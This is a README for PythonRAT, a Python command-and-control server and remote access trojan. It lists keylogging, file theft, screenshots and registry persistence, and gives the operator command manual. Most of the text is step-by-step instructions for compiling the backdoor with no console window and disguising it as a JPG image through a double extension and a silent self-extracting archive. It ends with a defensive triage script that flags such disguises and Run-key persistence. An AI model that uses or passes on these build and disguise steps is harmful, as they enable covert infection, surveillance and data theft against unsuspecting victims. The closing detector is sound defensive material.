The MALWARE PythonRAT is for EDUCATIONAL PURPOSES ONLY!!
Description
PythonRAT is a Command and Control (C2) server, written in Python3, that controls multiple machines running its Remote Administration Trojan (RAT), forming a botnet cluster.
- Integrated keylogger written as a class
  - Can be started and stopped remotely
  - With options to dump or overwrite the log file
- Check privilege level (Administrator/User)
- Spawn other programs
- Download files from target
- Download files from specified URL
- Upload files to target
- C2 allows control of multiple target sessions
- Issue a sendall command to every active session
- Persistence by creating a registry entry (Windows)
- Conceals infection by writing files in AppData (Windows)
- Screenshot of the target's screen which is sent to server
- Remote shutdown of the backdoor (executable is NOT safely removed)

Contents:

- Usage Manuals
- Wine and Pyinstaller (Win version) Installation on Linux
- Backdoor Compilation and Obfuscation for Windows
- Preview Images
```text
targets --> Prints Active Sessions
session *session num* --> Will Connect To Session (background to return)
clear --> Clear Terminal Screen
exit --> Quit ALL Active Sessions and Closes C2 Server!!
kill *session num* --> Issue 'quit' To Specified Target Session
sendall *command* --> Sends The *command* To ALL Active Sessions (sendall notepad)

quit --> Quit Session With The Target
clear --> Clear The Screen
background --> Send Session With Target To Background
cd *Directory name* --> Changes Directory On Target System
upload *file name* --> Upload File To The Target Machine From Working Dir
download *file name* --> Download File From Target Machine
get *url* --> Download File From Specified URL to Target ./
keylog_start --> Start The Keylogger
keylog_dump --> Print Keystrokes Typed On The Target From taskmanager.txt
keylog_stop --> Stop And Self Destruct Keylogger File
screenshot --> Takes screenshot and sends to server ./screenshots/
start *programName* --> Spawn Program Using backdoor e.g. 'start notepad'
remove_backdoor --> Removes backdoor from target!!!
===Windows Only===
persistence *RegName* *filename* --> Create Persistence In Registry
                                     copies backdoor to ~/AppData/Roaming/filename
                                     example: persistence Backdoor windows32.exe
check --> Check If Has Administrator Privileges
```
Python 2.7.14 Releases: https://www.python.org/downloads/release/python-2714/
```shell
┌──(root💀kali)-[~/]
└─# sudo su
dpkg --add-architecture i386
apt update
apt install wine32
wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
sudo wine msiexec -i ~/python-2.7.14.msi #x86 arch
```
```shell
┌──(root💀kali)-[~]
└─#
cd /root/.wine/drive_c/Python27
wine python.exe -m pip install pyinstaller
```

The backdoor also depends on the following packages, installed the same way:

- requests
- pyautogui
- pynput
```shell
$ pyinstaller --onefile --noconsole backdoor.py
```

or, using the Wine installation:

```shell
┌──(root💀kali)-[~]
└─#
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py
```

Alternatively, if an icon has already been created:

```shell
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py
```

This will produce ./dist/backdoor.exe
The executable backdoor.exe will be made to look like an image (jpg) file. By default, Windows does not show file extensions (e.g. backdoor.exe will show in Windows Explorer as backdoor). Hence, we will create an SFX archive named wallpaper.jpg.exe, which Windows Explorer will show as wallpaper.jpg.
This requires an image, of which we will also create a .ico icon version to assign to the SFX archive, making the executable appear to be an image.
Of course, the same method could be applied to an audio, document or video file using an appropriate icon.
An SFX archive is not the only method of obfuscating the executable. When compiling with Pyinstaller we can instead add the argument --add-data "/root/wallpaper.jpg;." together with --icon ~/wallpaper.ico.
```shell
┌──(root💀kali)-[~]
└─#
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py
mv ./dist/backdoor.exe ./dist/wallpaper.jpg.exe
```
- WinRAR > Add To Archive (image.jpg and backdoor.exe)
- Rename archive to: image.jpg.exe
- Add to SFX Archive (Y) and Advanced >
  - **Setup > Run after extraction**: California-HD-Background.jpg, then backdoor.exe
  - **Modes**: Unpack to temporary folder; Silent mode: Hide all
  - **Update**: Update mode > Extract and update files; Overwrite mode > Overwrite all files
  - **Text and icon**: Load SFX icon from the file (image ICO)
(Animated walkthrough: Create_SFXArchive_Instructions.gif.mp4)
This will produce an SFX archive which looks like an image.
While inspecting the file will reveal it is an executable, the .exe file extension is concealed. Furthermore, if viewed from the Desktop the file cannot be differentiated from a 'real' image.
Once opened, the SFX archive will open the image file inside the archive and the malware will execute afterwards.
Due to the --noconsole argument in Pyinstaller, no window will be rendered.
The backdoor.exe process can be seen in Task Manager and ended there if necessary.
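As an added defensive example (not part of PythonRAT), the Python script below triages the three artefacts this README produces: a double-extension name such as wallpaper.jpg.exe that Explorer shows as wallpaper.jpg, a PE 'MZ' header behind an image extension, and a Run-key value that launches an executable from AppData\Roaming, where the persistence command copies the backdoor. The file paths, header bytes and registry values are constructed samples.

```python
import ntpath

# Extensions Explorer hides by default, so "wallpaper.jpg.exe" displays as "wallpaper.jpg".
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
# Decoy extensions a dropper borrows to pass as an image, document or media file.
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".mp3", ".mp4"}
PE_MAGIC = b"MZ"  # every Windows PE file starts with the DOS 'MZ' stub

def extension_chain(path):
    """Lowercase extension chain of the file name: 'wallpaper.jpg.exe' -> ['.jpg', '.exe']."""
    parts = ntpath.basename(path).lower().split(".")
    return ["." + p for p in parts[1:] if p]

def is_double_extension_executable(path):
    """True for names such as 'wallpaper.jpg.exe' whose real extension Explorer hides."""
    exts = extension_chain(path)
    return len(exts) >= 2 and exts[-1] in EXEC_EXTS and exts[-2] in DECOY_EXTS

def magic_mismatch(path, head):
    """True when the name claims a decoy type but the first bytes are a PE header."""
    return any(e in DECOY_EXTS for e in extension_chain(path)) and head.startswith(PE_MAGIC)

def is_appdata_run_entry(command):
    """True for a Run-key command that launches an executable out of %APPDATA%\\Roaming."""
    exe = command.strip().strip('"').split('"')[0].lower()
    return "\\appdata\\roaming\\" in exe and ntpath.splitext(exe)[1] in EXEC_EXTS

def triage(files, run_values):
    """Return (item, reason) findings for (path, first bytes) and Run-key (name, command) pairs."""
    findings = []
    for path, head in files:
        if is_double_extension_executable(path):
            findings.append((path, "double extension hides .exe"))
        if magic_mismatch(path, head):
            findings.append((path, "PE header behind a non-executable extension"))
    for name, command in run_values:
        if is_appdata_run_entry(command):
            findings.append((name, "Run key starts an executable from AppData\\Roaming"))
    return findings

# Constructed sample observations (not real artefacts) to run the triage on.
SAMPLE_FILES = [
    (r"C:\Users\bob\Desktop\wallpaper.jpg.exe", b"MZ\x90\x00"),
    (r"C:\Users\bob\Pictures\holiday.jpg", b"\xff\xd8\xff\xe0"),
]
SAMPLE_RUN = [("Backdoor", r'"C:\Users\bob\AppData\Roaming\windows32.exe"')]

if __name__ == "__main__":
    for item in triage(SAMPLE_FILES, SAMPLE_RUN):
        print(item)
```

The header check is what defeats the rename alone: the extension can be hidden, but the first two bytes of a PE file cannot.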